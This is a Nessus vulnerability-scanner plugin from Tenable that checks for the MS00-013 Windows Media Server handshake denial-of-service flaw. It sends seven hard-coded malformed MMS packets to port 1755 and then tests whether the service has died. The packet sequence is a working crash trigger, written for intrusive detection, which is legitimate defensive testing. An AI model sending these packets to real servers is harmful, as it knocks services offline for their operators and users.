MS00-013: Microsoft Windows Media Server Malformed Handshake Sequence DoS (253943) (intrusive check)

2000-02-28T00:00:00
ID UNICAST_DOS.NASL
Type nessus
Reporter Tenable
Modified 2018-11-15T00:00:00

Description

It was possible to crash the remote Microsoft Media Server by sending it specially crafted packets.

                                        
                                            #
# (C) Tenable Network Security, Inc.
#

include("compat.inc");

if (description)
{
 script_id(10289);
 script_version("1.29");
 script_cvs_date("Date: 2018/11/15 20:50:29");

 script_cve_id("CVE-2000-0211");
 script_bugtraq_id(1000);
 script_xref(name:"MSFT", value: "MS00-013");
 script_xref(name:"MSKB", value:"253943");

 script_name(english:"MS00-013: Microsoft Windows Media Server Malformed Handshake Sequence DoS (253943) (intrusive check)");
 script_summary(english:"Crashes the remote media server");

 script_set_attribute(attribute:"synopsis", value:
"The remote host has an application that is affected by a
denial of service vulnerability.");
 script_set_attribute(attribute:"description", value:
"It was possible to crash the remote Microsoft Media Server 
by sending it specially crafted packets.");
 script_set_attribute(attribute:"see_also", value:"https://docs.microsoft.com/en-us/security-updates/SecurityBulletins/2000/ms00-013");
 script_set_attribute(attribute:"solution", value:
"See vendor advisory.");
 script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P");
 script_set_cvss_temporal_vector("CVSS2#E:POC/RL:OF/RC:C");
 script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
 script_set_attribute(attribute:"exploit_available", value:"true");

 script_set_attribute(attribute:"vuln_publication_date", value:"2000/02/23");
 script_set_attribute(attribute:"plugin_publication_date", value:"2000/02/28");
 script_set_attribute(attribute:"plugin_type", value:"remote");
 script_set_attribute(attribute:"cpe", value:"cpe:/a:microsoft:windows_media_services");
 script_end_attributes();

 script_category(ACT_DENIAL);
 script_copyright(english:"This script is Copyright (C) 2000-2018 Tenable Network Security, Inc.");
 script_family(english:"Windows");

 script_require_ports(1755);
 exit(0);
}

include("global_settings.inc");
include("misc_func.inc");

port = 1755;
if (! get_port_state(port)) exit(0);

packet1 = raw_string(
    0x01, 0x00, 0x00, 0x00, 0xce, 0xfa, 0x0b, 0xb0, 0xa0, 0x00, 0x00, 0x00,
    0x4d, 0x4d, 0x53, 0x20, 0x14, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
    0xf8, 0x53, 0xe3, 0xa5, 0x9b, 0xc4, 0x00, 0x40, 0x12, 0x00, 0x00, 0x00,
    0x01, 0x00, 0x03, 0x00, 0xf0, 0xf0, 0xf0, 0xf0, 0x0b, 0x00, 0x04, 0x00,
    0x1c, 0x00, 0x03, 0x00, 0x4e, 0x00, 0x53, 0x00, 0x50, 0x00, 0x6c, 0x00,
    0x61, 0x00, 0x79, 0x00, 0x65, 0x00, 0x72, 0x00, 0x2f, 0x00, 0x34, 0x00,
    0x2e, 0x00, 0x31, 0x00, 0x2e, 0x00, 0x30, 0x00, 0x2e, 0x00, 0x33, 0x00,
    0x38, 0x00, 0x35, 0x00, 0x37, 0x00, 0x3b, 0x00, 0x20, 0x00, 0x7b, 0x00,
    0x30, 0x00, 0x32, 0x00, 0x64, 0x00, 0x30, 0x00, 0x63, 0x00, 0x32, 0x00,
    0x63, 0x00, 0x30, 0x00, 0x2d, 0x00, 0x62, 0x00, 0x35, 0x00, 0x30, 0x00,
    0x37, 0x00, 0x2d, 0x00, 0x31, 0x00, 0x31, 0x00, 0x64, 0x00, 0x32, 0x00,
    0x2d, 0x00, 0x39, 0x00, 0x61, 0x00, 0x61, 0x00, 0x38, 0x00, 0x2d, 0x00,
    0x62, 0x00, 0x37, 0x00, 0x30, 0x00, 0x66, 0x00, 0x33, 0x00, 0x30, 0x00,
    0x34, 0x00, 0x34, 0x00, 0x61, 0x00, 0x65, 0x00, 0x37, 0x00, 0x65, 0x00,
    0x7d, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00);

packet2 = raw_string(
    0x01, 0x00, 0x00, 0x00, 0xce, 0xfa, 0x0b, 0xb0, 0x20, 0x00, 0x00, 0x00,
    0x4d, 0x4d, 0x53, 0x20, 0x04, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00,
    0x5e, 0xba, 0x49, 0x0c, 0x02, 0x2b, 0x01, 0x40, 0x02, 0x00, 0x00, 0x00,
    0x18, 0x00, 0x03, 0x00, 0xf1, 0xf0, 0xf0, 0xf0, 0x0b, 0x00, 0x04, 0x00
    );

packet3 = raw_string(
    0x01, 0x00, 0x00, 0x00, 0xce, 0xfa, 0x0b, 0xb0, 0x60, 0x00, 0x00, 0x00,
    0x4d, 0x4d, 0x53, 0x20, 0x0c, 0x00, 0x00, 0x00, 0x02, 0x00, 0x00, 0x00,
    0x83, 0xc0, 0xca, 0xa1, 0x45, 0xb6, 0x01, 0x40, 0x0a, 0x00, 0x00, 0x00,
    0x02, 0x00, 0x03, 0x00, 0xf1, 0xf0, 0xf0, 0xf0, 0xff, 0xff, 0xff, 0xff,
    0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xa0, 0x00, 0x02, 0x00, 0x00, 0x00,
    0x5c, 0x00, 0x5c, 0x00, 0x31, 0x00, 0x39, 0x00, 0x32, 0x00, 0x2e, 0x00,
    0x31, 0x00, 0x36, 0x00, 0x38, 0x00, 0x2e, 0x00, 0x30, 0x00, 0x2e, 0x00,
    0x32, 0x00, 0x5c, 0x00, 0x54, 0x00, 0x43, 0x00, 0x50, 0x00, 0x5c, 0x00,
    0x31, 0x00, 0x31, 0x00, 0x31, 0x00, 0x31, 0x00, 0x00, 0x00, 0x32, 0x00,
    0x63, 0x00, 0x30, 0x00
    );

packet4 = raw_string(
    0x01, 0x00, 0x00, 0x00, 0xce, 0xfa, 0x0b, 0xb0, 0x88, 0x00, 0x00, 0x00,
    0x4d, 0x4d, 0x53, 0x20, 0x11, 0x00, 0x00, 0x00, 0x03, 0x00, 0x00, 0x00,
    0x2b, 0x87, 0x16, 0xd9, 0xce, 0xf7, 0x01, 0x40, 0x0f, 0x00, 0x00, 0x00,
    0x05, 0x00, 0x03, 0x00, 0x01, 0x00, 0x00, 0x00, 0xff, 0xff, 0xff, 0xff,
    0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x54, 0x00, 0x68, 0x00,
    0x65, 0x00, 0x20, 0x00, 0x45, 0x00, 0x61, 0x00, 0x67, 0x00, 0x6c, 0x00,
    0x65, 0x00, 0x73, 0x00, 0x20, 0x00, 0x54, 0x00, 0x65, 0x00, 0x71, 0x00,
    0x75, 0x00, 0x69, 0x00, 0x6c, 0x00, 0x61, 0x00, 0x20, 0x00, 0x53, 0x00,
    0x75, 0x00, 0x6e, 0x00, 0x72, 0x00, 0x69, 0x00, 0x73, 0x00, 0x65, 0x00,
    0x20, 0x00, 0x32, 0x00, 0x38, 0x00, 0x6b, 0x00, 0x2f, 0x00, 0x65, 0x00,
    0x61, 0x00, 0x67, 0x00, 0x6c, 0x00, 0x65, 0x00, 0x73, 0x00, 0x32, 0x00,
    0x38, 0x00, 0x2e, 0x00, 0x61, 0x00, 0x73, 0x00, 0x66, 0x00, 0x00, 0x00,
    0x62, 0x00, 0x37, 0x00, 0x30, 0x00, 0x66, 0x00
    );

packet5 = raw_string(
    0x01, 0x00, 0x00, 0x00, 0xce, 0xfa, 0x0b, 0xb0, 0x48, 0x00, 0x00, 0x00,
    0x4d, 0x4d, 0x53, 0x20, 0x09, 0x00, 0x00, 0x00, 0x04, 0x00, 0x00, 0x00,
    0x67, 0x66, 0x66, 0x66, 0x66, 0x66, 0x02, 0x40, 0x07, 0x00, 0x00, 0x00,
    0x15, 0x00, 0x03, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
    0x00, 0x00, 0x00, 0x00, 0x00, 0x80, 0x00, 0x00, 0xff, 0xff, 0xff, 0xff,
    0x65, 0x00, 0x20, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
    0x00, 0x00, 0x00, 0x00, 0x00, 0x20, 0xac, 0x40, 0x02, 0x00, 0x00, 0x00,
    0x00, 0x00, 0x00, 0x00
    );

packet6 = raw_string(
    0x01, 0x00, 0x00, 0x00, 0xce, 0xfa, 0x0b, 0xb0, 0x30, 0x00, 0x00, 0x00,
    0x4d, 0x4d, 0x53, 0x20, 0x06, 0x00, 0x00, 0x00, 0x05, 0x00, 0x00, 0x00,
    0x0a, 0xd7, 0xa3, 0x70, 0x3d, 0x0a, 0x11, 0x40, 0x04, 0x00, 0x00, 0x00,
    0x33, 0x00, 0x03, 0x00, 0x02, 0x00, 0x00, 0x00, 0xff, 0xff, 0x01, 0x00,
    0x00, 0x00, 0xff, 0xff, 0x02, 0x00, 0x00, 0x00, 0xff, 0xff, 0xff, 0xff,
    0x65, 0x00, 0x20, 0x00
    );

packet7 = raw_string(
    0x01, 0x00, 0x00, 0x00, 0xce, 0xfa, 0x0b, 0xb0, 0x38, 0x00, 0x00, 0x00,
    0x4d, 0x4d, 0x53, 0x20, 0x07, 0x00, 0x00, 0x00, 0x06, 0x00, 0x00, 0x00,
    0x2f, 0xdd, 0x24, 0x06, 0x81, 0x15, 0x11, 0x40, 0x05, 0x00, 0x00, 0x00,
    0x07, 0x00, 0x03, 0x00, 0x01, 0x00, 0x00, 0x00, 0xff, 0xff, 0x01, 0x00,
    0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xff, 0xff, 0xff, 0xff,
    0xff, 0xff, 0xff, 0xff, 0x16, 0xca, 0x03, 0x80, 0x04, 0x00, 0x00, 0x00
    );


soc = open_sock_tcp(port);
if (! soc) exit(1);

  send(socket:soc, data:packet1);
  send(socket:soc, data:packet2);
  send(socket:soc, data:packet3);
  send(socket:soc, data:packet4);
  send(socket:soc, data:packet5);
  send(socket:soc, data:packet6);
  send(socket:soc, data:packet7);
  close(soc);
  sleep(4);

  if (service_is_dead(port: port) > 0)
    security_warning(port);